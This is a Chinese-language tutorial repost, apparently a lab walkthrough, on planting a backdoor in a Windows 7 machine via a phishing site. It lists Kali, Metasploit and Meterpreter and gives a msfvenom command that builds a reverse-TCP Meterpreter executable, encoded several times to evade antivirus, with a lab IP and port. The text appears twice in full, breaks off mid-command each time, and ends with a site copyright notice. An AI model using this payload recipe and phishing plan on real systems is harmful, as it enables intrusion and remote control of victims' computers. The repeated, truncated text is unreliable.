admin管理员组文章数量:1026989
渗透测试window7,加强木马防范意识
通过钓鱼网站给win7系统植入后门并控制的流程
一、知识点总结:
1 生成后门程序
2 通过钓鱼方式植入木马靶机(社工)
3 使用Metasploit配置监控并控制靶机
4 控制靶机我们能做什么
二、用到的系统和工具:
1 Kali(系统);
2 Windows7(靶机系统);
3 Metasploit(渗透工具);
4 msfvenom(Metasploit自带的后门生成模块);
5 Meterpreter(后渗透常用通道);
三、使用msfvenom开始生成木马
1 终端内输入: msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai -f exe -o new.exe -i 5
2 监控IP 查询方式 终端内输入:ip add 查到IP为192.168.3.23
3 监控端口选择一个没备占用的 这边使用:4567
4 -e = 使用 x86/shikata_ga_nai编码器
5 -f = 输出 exe 格式
6 -o 输出文件名和格式 我这边输出 shell.exe
7 -i 编码次数 我这边设置 5 次
8 自己组合命令
msfvenom -p windows/meterpreter/reverse
渗透测试window7,加强木马防范意识
通过钓鱼网站给win7系统植入后门并控制的流程
一、知识点总结:
1 生成后门程序
2 通过钓鱼方式植入木马靶机(社工)
3 使用Metasploit配置监控并控制靶机
4 控制靶机我们能做什么
二、用到的系统和工具:
1 Kali(系统);
2 Windows7(靶机系统);
3 Metasploit(渗透工具);
4 msfvenom(Metasploit自带的后门生成模块);
5 Meterpreter(后渗透常用通道);
三、使用msfvenom开始生成木马
1 终端内输入: msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai -f exe -o new.exe -i 5
2 监控IP 查询方式 终端内输入:ip add 查到IP为192.168.3.23
3 监控端口选择一个没备占用的 这边使用:4567
4 -e = 使用 x86/shikata_ga_nai编码器
5 -f = 输出 exe 格式
6 -o 输出文件名和格式 我这边输出 shell.exe
7 -i 编码次数 我这边设置 5 次
8 自己组合命令
msfvenom -p windows/meterpreter/reverse
版权声明:本文标题:渗透测试window7,加强木马防范意识 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://it.en369.cn/jiaocheng/1729792584a972113.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论